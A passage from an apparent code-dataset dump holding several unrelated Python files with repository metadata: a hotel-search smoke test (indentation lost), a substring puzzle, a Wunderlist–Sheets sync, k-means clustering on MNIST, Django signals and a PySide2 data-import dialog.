logName = 'logs/SearchResultsModule/STSR_log_' + logSuffix.strftime('%Y_%m_%d__%H%M_%S') + '.log'
try:
logFileCreate = open(logName,"w+")
logFileCreate.close()
except:
print()
#Set up logging objects
logsHandler = logging.handlers.WatchedFileHandler(os.environ.get("LOGFILE", logName))
logsFormatting = logging.Formatter(logging.BASIC_FORMAT)
logsHandler.setFormatter(logsFormatting)
root = logging.getLogger()
root.setLevel(os.environ.get("LOGLEVEL", "INFO"))
root.addHandler(logsHandler)
print("Current testing log file is: ", logName)
#Preconditions for proceeding with smoke test.
try:
logging.info('Starting smoke test preconditions.')
print('Starting smoke test preconditions.')
RM.open_search_page()
RM.close_cookie_banner()
RM.loadtime()
except Exception as err:
print(str(err))
logging.exception(str(err))
#Smoke Test for Search Results (TCIDs 9-10),
try:
#TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?
print('Beginning TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?')
logging.info('Beginning TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?')
RM.select_sort_by_field()
RM.click_miles()
RM.loadtime()
print('TCID 9 has been executed.')
logging.info('TCID 9 has been executed.')
#TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?
print('Beginning TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?')
logging.info('Beginning TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?')
RM.select_hotel()
RM.loadtime()
print('TCID 10 has been executed.')
logging.info('TCID 10 has been executed.')
except Exception as err:
logging.exception(str(err))
#Ending smoke test for Search Results module.
print('Search Results module smoke test complete. Closing browser.')
RM.close_browser()
logging.info('Search Results module smoke test complete. Browser closed.') | just-hugo/Test-Automation | Rocketmiles/SmokeTestSearchResultsModule.py | SmokeTestSearchResultsModule.py | py | 2,827 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "RocketMilesClass.RocketMiles",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.mkdir",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.mkdir",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now"... |
27045433039 | import sys
import pysnooper
@pysnooper.snoop()
def lengthOfLongestSubstring(s: str) -> int:
a_ls = [x for x in s]
max_len = 0
substring = []
for a in a_ls:
if a in substring:
idx = substring.index(a)
substring = substring[idx + 1:]
substring.append(a)
if max_len < len(substring):
max_len = len(substring)
return max_len
if __name__ == "__main__":
max_len = lengthOfLongestSubstring(sys.argv[1])
print(max_len)
| ikedaosushi/python-sandbox | pysnoozer/lengthOfLongestSubstring.py | lengthOfLongestSubstring.py | py | 504 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "pysnooper.snoop",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 22,
"usage_type": "attribute"
}
] |
73269742825 | def checkCompletion(access_token,client_id):
import wunderpy2
import pygsheets
import datetime
x = 2
gc = pygsheets.authorize()
sh = gc.open('wunderlist_update')
wks = sh.sheet1
api = wunderpy2.WunderApi()
client = api.get_client(access_token, client_id)
current_rows = wks.get_all_values()
for row_data in current_rows:
if row_data[2] == 'TRUE':
x = x + 1
if row_data[2] == 'FALSE':
wunder_id = row_data[0]
listo = client.get_task(task_id=wunder_id)
if str(listo['completed']) == 'FALSE':
x = x + 1
if str(listo['completed']) == 'TRUE':
date_now = datetime.datetime.now().date()
wks.update_cell('C' + str(x), 'TRUE')
wks.update_cell('E' + str(x), str(date_now))
x = x + 1 | krishan147/wundersheet | wundersheet/check_task_completion.py | check_task_completion.py | py | 876 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygsheets.authorize",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "wunderpy2.WunderApi",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "datetime... |
27621948392 | import time
import pandas as pd
import numpy as np
import random
from sklearn.metrics.pairwise import cosine_similarity, euclidean_distances,manhattan_distances
from sklearn.preprocessing import MinMaxScaler
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
#CLASS START=====================================================================================================================
class kmeans:
def __init__(self,k):
self.k = k
#Function to read and preproccess the data
def read_data(self):
MNIST_df = pd.read_csv("image_new_test_MNIST.txt", header=None)
MNIST_array = np.array(MNIST_df)
MNIST_array = MNIST_array.astype(float)
#normalization of data using minmax scaler
scaler = MinMaxScaler()
scaled_MNIST_array = scaler.fit_transform(MNIST_array)
#dimension reduction
pca = PCA(n_components= 30)
pca_MNIST_array = pca.fit_transform(scaled_MNIST_array)
#high dimension reduction using TSNE
tsne = TSNE(n_components = 2, perplexity = 40, init = 'pca', random_state=0)
tsne_MNIST_array = tsne.fit_transform(pca_MNIST_array)
return tsne_MNIST_array, MNIST_df
#Function to calculate the manhattan distance
def clustering_manhattan_distance(self, MNIST_array, centroids):
distance_matrix = manhattan_distances(MNIST_array, centroids)
closest_centroids = []
for i in range(distance_matrix.shape[0]):
c = np.argmin(distance_matrix[i])
closest_centroids.append(c)
return closest_centroids
#Function to calculate the similarity
def clustering_cosine_similarity(self, MNIST_array, centroids):
distance_matrix = cosine_similarity(MNIST_array, centroids)
closest_centroids = []
for i in range(distance_matrix.shape[0]):
c = np.argmax(distance_matrix[i])
closest_centroids.append(c)
return closest_centroids
#Function to calculate euclidean distance
def clustering_euclidean_distance(self, MNIST_array, centroids):
distance_matrix = euclidean_distances(MNIST_array, centroids)
closest_centroids = []
for i in range(distance_matrix.shape[0]):
c = np.argmin(distance_matrix[i])
closest_centroids.append(c)
return closest_centroids
#Function to clculate the centroids
def calculate_centroids(self, MNIST_array, nearest_centroid, centroids):
cluster_d = list()
#all_cluster_distances = [0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]
all_cluster_distances = np.zeros(len(centroids))
new_centroids = list()
new_df = pd.concat([pd.DataFrame(MNIST_array), pd.DataFrame(nearest_centroid, columns=['Cluster'])], axis=1)
new_df_arr = np.array(new_df['Cluster'])
for c in set(new_df_arr):
thiscluster = new_df[new_df['Cluster'] == c][new_df.columns[:-1]]
temp = np.array(centroids[c])
temp = temp.reshape(1,-1)
#cluster_d = euclidean_distances(thiscluster, temp)
cluster_d = manhattan_distances(thiscluster, temp)
for d in cluster_d:
all_cluster_distances[c] += d*d
cluster_mean = thiscluster.mean(axis=0)
new_centroids.append(cluster_mean)
return new_centroids, all_cluster_distances
#Function to visualize the SSE and no.of iterations
def visualize_sse(self, iterations, SSE):
plt.figure()
plt.plot(range(iterations), SSE, 'rx-')
plt.xlabel('No.of iterations')
plt.ylabel('SSE(Sum of squared errors)')
plt.title('Elbow Method showing the optimal iterations')
plt.show()
#Function to visualize the SSE and different k-values:
def visualize_k_sse(self):
MNIST_array, MNIST_df = self.read_data()
all_SSE = []
all_k = []
for k in range(2,21,2):
#Randomly select three points as centroids
centroid_index = random.sample(range(0, len(MNIST_df)), k)
centroids = list()
for i in centroid_index:
centroids.append(MNIST_array[i])
#converting list into numpy array
centroids = np.array(centroids)
#List for sum of squared errors
SSE = list()
no_of_iterations = 50
closest_centroid = list()
for i in range(no_of_iterations):
closest_centroid = self.clustering_manhattan_distance(MNIST_array, centroids)
#closest_centroid = clustering_cosine_similarity(iris_array, centroids)
centroids, all_cluster_d = self.calculate_centroids(MNIST_array, closest_centroid, centroids)
SSE.append(sum(all_cluster_d))
all_SSE.append(min(SSE))
all_k.append(k)
#Plot the values
plt.figure()
plt.plot(all_SSE , all_k,'rx-')
plt.xlabel('SSE')
plt.ylabel('K-values')
plt.title('The Elbow Method showing the optimal k - value')
plt.show()
#Function for k-means clustering
def main_kmeans(self):
MNIST_array, MNIST_df = self.read_data()
#number of clusters
k = self.k
#Randomly select k number of points as centroids
centroid_index = random.sample(range(0, len(MNIST_df)), k)
centroids = list()
for i in centroid_index:
centroids.append(MNIST_array[i])
#converting list into numpy array
centroids = np.array(centroids)
#List for sum of squared errors
SSE = list()
no_of_iterations = 50
closest_centroid = list()
for i in range(no_of_iterations):
#closest_centroid = self.clustering_euclidean_distance(MNIST_array, centroids)
#closest_centroid = self.clustering_cosine_similarity(MNIST_array, centroids)
closest_centroid = self.clustering_manhattan_distance(MNIST_array, centroids)
centroids, all_cluster_d = self.calculate_centroids(MNIST_array, closest_centroid, centroids)
SSE.append(sum(all_cluster_d))
clustered_MNIST_df = pd.concat([pd.DataFrame(MNIST_array), pd.DataFrame(closest_centroid, columns=['Cluster'])], axis=1)
clustered_MNIST_df.replace({0:1,1:2,2:3,3:4,4:5,5:6,6:7,7:8,8:9,9:10}, inplace=True)
#To visualize the number iterations on kmeans and SSE
self.visualize_sse(no_of_iterations, SSE)
#Saving the results into the file
clustered_MNIST_df.to_csv('MNIST_results.csv',columns=['Cluster'], index =False, header = False)
#CLASS END=====================================================================================================================
#MAIN START=====================================================================================================================
#Execution start time
start_time = time.time()
kmeans_obj = kmeans(k = 10)
kmeans_obj.main_kmeans()
#To visualize the different k values and SSE
#kmeans_obj.visualize_k_sse()
print("Total execution time :", time.time() - start_time, "seconds")
#MAIN END=====================================================================================================================
| hrishivib/k-means-iris-MNIST-classification | k-means_MNIST.py | k-means_MNIST.py | py | 7,624 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "sklearn.preprocessing.MinMaxScaler",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklear... |
6793257031 | from django.apps import apps
from django.db.models.signals import post_save
from .invitation_status_changed import when_invitation_registration_post_save
from .consultant_validation_status_changed import when_consultant_validation_status_update
def setup_signals():
Invitation = apps.get_model(
app_label='invitation',
model_name='Invitation',
)
ConsultantValidationStatus = apps.get_model(
app_label='consultant',
model_name='ConsultantValidationStatus',
)
post_save.connect(
when_invitation_registration_post_save,
sender=Invitation,
)
post_save.connect(
when_consultant_validation_status_update,
sender=ConsultantValidationStatus,
)
| tomasgarzon/exo-services | service-exo-core/registration/signals/__init__.py | __init__.py | py | 736 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.apps.apps.get_model",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.apps.apps",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.apps.apps.get_model",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "... |
17883995055 | # -*- encoding: utf-8 -*-
import logging
import os
import time
import numpy as np
import openpyxl
import pandas as pd
import xlrd
# 导入PyQt5模块
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from dataImportModel import Ui_Form as dataImportFormEngine
from widgets import kwargs_to_str
from lib.comm import set_var, run_command
# 导入matlab加载模块
# 定义日志输出格式
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class ImportDialog(QDialog):
signal_data_change = Signal(str, dict, str, str, str, str, str) # 自定义信号,用于传递文件路径
extension_lib = None
def __init__(self, parent=None):
super(ImportDialog, self).__init__(parent)
self.current_dataset: pd.DataFrame = None
self.import_message = {"isError": False, "warningMessage": []}
self.separator_char = [",", ";", "\\s", "\\t"]
self.encode_type = ["utf8", "gb2312", "gbk", "ascii"]
def importDatasetPreview(self):
pass
def getImportParam(self):
pass
def importDatasetReload(self):
pass
def updateTableView(self):
pass
def open_file(self, path: str):
assert os.path.exists(path)
self.lineEdit_filePath.setText(path)
self.previewButton()
def openfile(self):
"""
选择文件,需要支持三种场景:
(1)点击 “浏览” 按钮
(2)点击 “预览” 按钮
"""
path = self.lineEdit_filePath.text()
self.import_param.update(choosefile=False)
if not path:
# 先判断传入的 path 是否有内容,
path, openfile_type = QFileDialog.getOpenFileName(self, '选择文件', self.get_work_dir(),
"文件类型({})".format(self.file_types))
self.lineEdit_filePath.setText(path)
if path:
# 如果没有选择文件就关闭窗口,这时候path还是没有路径,datasetName 则清空
temp_name = (os.path.split(self.lineEdit_filePath.text())[1]).split(".")[0:-1]
# 获取文件名称,并将文件名称作为导入的变量名称,如果文件名称为空,则使用 temp 作为变量名称
dataset_name = "temp" if temp_name == [""] else ".".join(temp_name)
self.lineEdit_datasetName.setText(dataset_name)
else:
self.lineEdit_filePath.setText(self.import_param["filepath"])
def chooseFileButton(self):
"""选择文件按钮"""
self.lineEdit_filePath.setText("")
self.previewButton()
def previewButton(self):
"""预览按钮"""
self.import_param.update(ispreview=True)
self.openfile()
self.getImportParam()
if self.import_message["isError"]:
self.showWarningMessage()
else:
if self.lineEdit_filePath.text():
self.importDatasetLoad()
self.updateTableView()
def importDatasetButton(self):
"""对发送钱的数据验证"""
self.import_param.update(ispreview=False)
self.getImportParam()
if self.import_message["isError"]:
self.showWarningMessage()
return
# if self.import_param["filepath"] == "" or len(self.current_dataset) == 0:
if len(self.current_dataset) == 0:
self.showWarningMessage(info="导入失败!\n提示:请提供正确数据集")
return
var_name_check = self.updateDatasetVarname()
if var_name_check:
import sys
t0 = time.time()
self.importDatasetLoad()
self.sendDataset()
t1 = time.time()
logger.info("导入数据集所用时间: {t} s 大小 {m} MB".format(
t=round(t1 - t0, 2), m=round(sys.getsizeof(self.current_dataset) / 1024, 2)
))
self.current_dataset = None
def importDatasetLoad(self):
"""获取数据并做检验"""
error = ""
self.import_param.update(status=False)
try:
self.importDatasetReload()
self.import_param.update(status=True)
except UnicodeDecodeError as e:
encodetype = self.import_param["param"]["encoding"]
self.updateWarningMessage(info="指定的编码方式“{}”无法解码要打开的文件,请尝试其他编码方式".format(encodetype))
error = str(e)
except MemoryError as e:
self.updateWarningMessage(info="文件过大,超过内存上限,导入失败!")
error = str(e)
except Exception as e:
self.updateWarningMessage(info="导入失败,错误详情:\n{}".format(str(e)))
error = str(e)
if self.import_message["isError"]:
self.showWarningMessage()
return (error)
def getDatasetInfo(self, varname=""):
"""
获取变量的名称、数据结构等信息
目前暂不支持保留用户重新配置的字段数据类型方案
varname = 变量统一命名
"""
self.import_param.update(varname={}, dtypes={})
for k in self.current_dataset:
self.import_param["varname"][k] = varname if varname else k
if type(self.current_dataset[k]) == pd.DataFrame:
self.import_param["dtypes"][k] = self.current_dataset[k].dtypes
else:
self.import_param["dtypes"][k] = type(self.current_dataset[k])
def updateDatasetVarname(self):
"""
更新导入数据集时候的名称
TODO: 重置数据集名称
考虑到未来导入数据集时候需要重命名数据集的名称,可能会存在这几类场景:
(1)导入后的变量名称更新
【1】一个文件一个单变量(页面)导入
【2】一个文件多变量(页面)导入,导入后可能以一个字典导入,或是多个变量名称,如果数据结构都一致情况下,
可能还有合并成一个变量导入
(2)导入时候使用什么类型数据结构导入,数据框,字典,字符,列表等
(3)导入时候的数据结构的调整
(4)导入时候变量是否有存在,如果有存在,则需要提醒用户修改冲突的变量名称
因此考虑将这部分独立出来进行处理。
"""
# 使用当前“数据集名” / “页面” 的名称
self.newdatasetname = {"varname": {}}
e = self.import_param["datasetname"]
while True:
var_name, ok = QInputDialog.getText(self, "变量名", "输入新的变量名称:", QLineEdit.Normal, e)
if ok:
if len(var_name) == 0:
QMessageBox.warning(self, "提示", "请输入变量名称!")
continue
elif self.extension_lib.Data.var_exists(var_name):
# 在变量名称冲突情况下,允许用户判断是否覆盖变量名称
isCover = QMessageBox().question(None, "提示", "变量 {} 已经存在,是否覆盖?".format(var_name),
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if isCover == QMessageBox.Yes:
break
else:
continue
elif not var_name.isidentifier():
QMessageBox.warning(self, '提示', '变量名无效\n提示:\n1、不要以数字开头;\n2、不要包含除下划线外的所有符号。')
else:
break
else:
ok = False
self.import_param.update(ispreview=True, status=True)
break
if ok:
self.newdatasetname["varname"][e] = var_name
# if self.import_param["ismerge"]:
# self.newdatasetname["datasetname"] = var_name
# self.import_param["datasetname"] = var_name
# else:
# self.newdatasetname["varname"][e] = var_name
# self.import_param["varname"][e] = var_name
return (ok)
def sendDataset(self):
"""
这个方法与具体导入sas,spss还是excel数据都是无关的。
其实意思就是把pandas数据加入到工作空间中。
"""
if self.import_param["status"]:
# if self.import_param["ismerge"]:
# set_var(self.newdatasetname["datasetname"], self.current_dataset)
# else:
for name_i, var_i in self.newdatasetname["varname"].items():
set_var(var_i, self.current_dataset[name_i]) # 将数据导入工作空间
QMessageBox.information(self, "{}导入结果".format(""), "数据导入完成!", QMessageBox.Yes)
self.close()
def clearImportParam(self):
"""重置数据集"""
self.current_dataset = {}
self.import_message = {"isError": False, "warningMessage": []}
self.import_param = {
"datasetname": "", # 数据集名称
"varname": {}, # 导入的变量名称,dict,用于后续存放更改变量名称后的结果
"filepath": "", # 文件路径
"hasheader": True, # 首行是否为列名称
"dtypes": {}, # 字段数据类型,dict,用于后续存放更改数据类型后的结果
"status": False, # 导入结果状态:True = 导入成功,False = 导入失败
"param": {}, # 导入面板上的参数,dict
"ispreview": True, # 是否预览
"ismerge": False # 多变量数据集是否合并成字典导入
}
def get_work_dir(self) -> str:
"""获取工作路径"""
return self.extension_lib.Program.get_work_dir()
def center(self):
"""将窗口置于中心"""
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def keyPressEvent(self, e):
"""按键盘Escape退出当前窗口"""
if e.key() == Qt.Key_Escape:
button = QMessageBox.question(self, "Question", "是否退出当前窗口?",
QMessageBox.Ok | QMessageBox.Cancel, QMessageBox.Ok)
if button == QMessageBox.Ok:
self.close()
def showWarningMessage(self, info=""):
"""显示异常信息"""
info = info if info else self.import_message["warningMessage"][0]
if info:
QMessageBox.warning(self, '警告:', info)
logging.info("获取数据警告:\n" + info)
def updateWarningMessage(self, info="", new=True):
"""更新导入状态"""
if new:
self.import_message["isError"] = True
self.import_message["warningMessage"].append(info)
else:
self.import_message["isError"] = False
self.import_message["warningMessage"] = []
def checkFilePath(self, path):
'''检查输入的文件路径是否合法'''
if path:
if not os.path.exists(path):
self.updateWarningMessage(info="数据集路径不存在,\n请重新输入数据集路径!")
if os.path.split(path)[-1].split(".")[-1].lower() not in self.file_types:
self.updateWarningMessage(
info="数据文件格式有错:\n仅支持({})类型文件,\n请重新输入数据集路径!".format(self.file_types)
)
return (path)
def checkRowsNumber(self, rows, types):
'''检查行数是否为正整数或“全部”'''
typesDict = {
"limitRows": "“限定行数”必须是大于等于0的整数或“全部”",
"skipRows": "“跳过行数”必须是大于等于0的整数"
}
if rows == "全部":
row_number = None
elif rows.isdigit():
row_number = int(rows)
else:
row_number = 0
self.updateWarningMessage(info="{}\n请重新输入!".format(typesDict[types]))
if self.import_param["ispreview"] and types == "limitRows":
# 判断是否为预览,或是限制行数
row_number = min([100, row_number if row_number else 101])
return (row_number)
def headerAsColumns(self, data):
"""首行为列名"""
colnames = pd.DataFrame([data.columns], index=[0], columns=data.columns.tolist())
data.index += 1
data = data.append(colnames, ignore_index=False)
data.sort_index(inplace=True)
data.columns = ["C" + str(i + 1) for i in range(data.shape[1])]
return (data)
def datasetUpdate(self, data, skiprow, limitrow):
"""对数据集的规模进行处理"""
data = data[data.index >= skiprow] # 跳过行数
if limitrow:
limitrows = min(data.shape[0], limitrow)
data = data.head(limitrows)
return (data)
def showDatasetPreview(self, data, header=True):
"""导入的数据集可视化"""
if not header:
# 首行不为列名情况下的处理
data = self.headerAsColumns(data)
table_rows, table_colunms = data.head(100).shape
table_header = [str(col_i) for col_i in data.columns.tolist()]
self.tableWidget_previewData.setColumnCount(table_colunms)
self.tableWidget_previewData.setRowCount(table_rows)
self.tableWidget_previewData.setHorizontalHeaderLabels(table_header)
# 数据预览窗口
for i in range(table_rows):
row_values = data.iloc[i].tolist()
for j, element in enumerate(row_values):
newItem = QTableWidgetItem(str(element))
newItem.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.tableWidget_previewData.setItem(i, j, newItem)
def updateDatasetNameLine(self, tag):
"""更新数据集显示标签"""
new_datasetname = self.import_param["datasetname"] if tag == "(全部导入)" else tag
self.lineEdit_datasetName.setText(new_datasetname)
def clearPreviewDataTableWidget(self):
"""清理表格组件内容"""
self.tableWidget_previewData.clear()
self.showDatasetPreview(data=pd.DataFrame([]))
def showHelp(self):
from packages.pm_helpLinkEngine import helpLinkEngine as h
h.helpLink.openHelp("dataio_sample_showhelp")
# 数据库相关的方法
def checkTextNotNull(self, dicts):
"""检验输入内容是否为空"""
db_dict = {"host": "IP地址", "user": "用户名称", "passwd": "密码", "db": "数据库名称", "password": "密码",
"port": "IP端口", "charset": "数据类型", "table": "表格名称", "schema": "数据模式", "database": "数据库名称",
"server_name": "服务名称"}
for k, v in dicts.items():
if not v:
self.updateWarningMessage(info="‘{tag}’不能为空,请重新输入!".format(tag=db_dict[k]))
def updateDatabaseConnectStatusLabel(self, e=""):
tag = {"label": "连接成功", "color": "color: blue;"}
if e:
tag.update(label='连接失败:' + e, color="color: rgb(255, 0, 0);")
self.label_test.setHidden(False)
self.label_test.setText(tag["label"])
self.label_test.setStyleSheet(tag["color"])
def dbConnectTestButton(self):
"""检查数据库连接是否有效"""
self.import_param.update(ispreview=True)
self.getImportParam()
if self.import_message["isError"]:
self.showWarningMessage()
return
error = self.importDatasetLoad()
self.updateDatabaseConnectStatusLabel(error)
def dbDatasetImportButton(self):
"""导入数据按钮"""
self.import_param.update(ispreview=False)
self.getImportParam()
if self.import_message["isError"]:
self.showWarningMessage()
return
var_name_check = self.updateDatasetVarname()
if var_name_check:
import sys
t0 = time.time()
error = self.importDatasetLoad()
self.updateDatabaseConnectStatusLabel(error)
self.sendDataset()
t1 = time.time()
logger.info("导入数据集所用时间: {t} s 大小 {m} MB".format(
t=round(t1 - t0, 2), m=round(sys.getsizeof(self.current_dataset) / 1024, 2)
))
self.current_dataset = None
def getCurFetchData(self, cur):
"""获取数据库返回的分页数据"""
temp = pd.DataFrame([])
try:
cur.execute(self.import_param["sql"])
if cur.description:
temp = pd.DataFrame(data=list(cur.fetchall()),
columns=list(map(lambda x: x[0], cur.description)))
except Exception as e:
self.updateWarningMessage("导入失败,错误详情:\n{}" + str(e))
return (temp)
def updateChooseTagName(self, comboBox, tagname=[]):
""" 加载导入文件变量名称 """
comboBox.clear()
if not self.import_param["status"]:
return
if not tagname:
tagname = list(self.current_dataset)
tagname = ["(全部导入)"] + tagname if len(tagname) > 1 else tagname
for v in tagname:
# 更新Excel导入界面中"数据位置"列表
comboBox.addItem(v)
# 优化完成
class ImportTextForm(ImportDialog, dataImportFormEngine):
"""
"导入Text"窗口,包含方法:
(1)getImportParam:获取面板中的配置信息
(2)importDatasetReload:重新加载文件数据内容
(3)updateTableView:更新视图呈现数据
"""
def __init__(self, parent=None):
self.file_types = "*.csv *.txt *.tsv"
self.IconPath = ":/resources/icons/txt.svg"
super().__init__(parent)
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.checkBox_asString.stateChanged.connect(self.previewButton) # 是否以文本形式导入
self.comboBox_encode.currentTextChanged.connect(self.previewButton) # 选择编码方式
self.comboBox_separator.currentTextChanged.connect(self.previewButton) # 选择分割符号
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
separator_char = ["\\n"] + self.separator_char
self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
self.comboBox_separator = self.updateForm_ComboBox(self.comboBox_separator, separator_char)
self.horizontalLayoutAddUI(self.checkBox_asString)
self.horizontalLayoutAddUI(self.checkBox_ifColumns)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
self.verticalLayoutAddUI(self.lineEdit_skipRow, "left")
self.verticalLayoutAddUI(self.comboBox_separator, "right")
self.verticalLayoutAddUI(self.comboBox_encode, "right")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={},
asString=self.checkBox_asString.isChecked(),
param={
"filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
"engine": "python",
"header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
"sep": self.comboBox_separator.currentText(),
"encoding": self.comboBox_encode.currentText(),
"nrows": self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
"skiprows": self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows")
}
)
def importDatasetReload(self):
"""
刷新导入的数据
file_path: 导入路径
"""
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
if self.import_param["asString"]:
with open(file=param["filepath_or_buffer"], encoding=param["encoding"]) as f:
size = param["nrows"] if param["nrows"] else -1
temp = f.read(size)
f.close()
else:
temp = pd.read_table(**param)
# 文本一次只导入一个文件,因此默认变名称即为数据集名称
self.current_dataset[varname] = temp
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
dataset = self.current_dataset[self.import_param["datasetname"]]
if self.checkBox_asString.isChecked():
preview_data = pd.DataFrame({"文本": [dataset[:100]]})
header = True
else:
preview_data = dataset.head(100)
header = self.checkBox_ifColumns.isChecked()
self.showDatasetPreview(data=preview_data, header=header)
# 优化完成
class ImportCsvForm(ImportDialog, dataImportFormEngine):
"""导入CSV窗口"""
def __init__(self, parent=None):
self.IconPath = ":/resources/icons/csv.svg"
self.file_types = "*.csv"
super().__init__(parent)
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.checkBox_ifColIndex.stateChanged.connect(self.previewButton) # 首列是否为列名
self.comboBox_encode.currentTextChanged.connect(self.previewButton) # 选择编码方式
self.comboBox_separator.currentTextChanged.connect(self.previewButton) # 选择分割符号
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
self.comboBox_separator = self.updateForm_ComboBox(self.comboBox_separator, self.separator_char)
self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
self.horizontalLayoutAddUI(self.checkBox_ifColumns)
self.horizontalLayoutAddUI(self.checkBox_ifColIndex)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
self.verticalLayoutAddUI(self.lineEdit_skipRow, "left")
self.verticalLayoutAddUI(self.comboBox_separator, "right")
self.verticalLayoutAddUI(self.comboBox_encode, "right")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={},
param={
"filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
"engine": "c",
"header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
"sep": self.comboBox_separator.currentText(),
"index_col": 0 if self.checkBox_ifColIndex.isChecked() else None,
"encoding": self.comboBox_encode.currentText(),
"nrows": self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
"skiprows": self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows")
}
)
def importDatasetReload(self):
"""
刷新导入的数据
file_path: 导入路径
"""
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
# CSV一次只导入一个文件,因此默认变名称即为数据集名称
self.current_dataset[varname] = pd.read_csv(**param)
run_command("", "pd.read_csv(%s)" % kwargs_to_str(param))
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
dataset = self.current_dataset[self.import_param["datasetname"]]
if self.comboBox_separator.currentText() == "(无)":
preview_data = pd.DataFrame({"文本": [dataset[:100]]})
header = True
else:
preview_data = dataset.head(100)
header = self.checkBox_ifColumns.isChecked()
self.showDatasetPreview(data=preview_data, header=header)
# 后续还需要进一步优化方案
class ImportExcelForm(ImportDialog, dataImportFormEngine):
"""打开excel导入窗口"""
def __init__(self, parent=None):
super().__init__(parent)
self.IconPath = ":/resources/icons/excel.svg"
self.setupUi(self)
self.center()
self.clearImportParam()
self.new_import_filepath = ""
self.file_types = "*.xls *.xlsx"
self.sheetsname = []
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.checkBox_ifColIndex.stateChanged.connect(self.previewButton) # 首列是否为列名
self.comboBox_sheetname.currentTextChanged.connect(self.updateTableView) # 切换页面
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
self.horizontalLayoutAddUI(self.checkBox_ifColumns) # 首行为列名
self.horizontalLayoutAddUI(self.checkBox_ifColIndex) # 首列为行名
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left") # 数据集名称
self.verticalLayoutAddUI(self.comboBox_sheetname, "right") # 页面名称
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left") # 限制行数
self.verticalLayoutAddUI(self.lineEdit_skipRow, "right") # 跳过行数
self.publicUIFormActivity()
self.AddUIFormActivity()
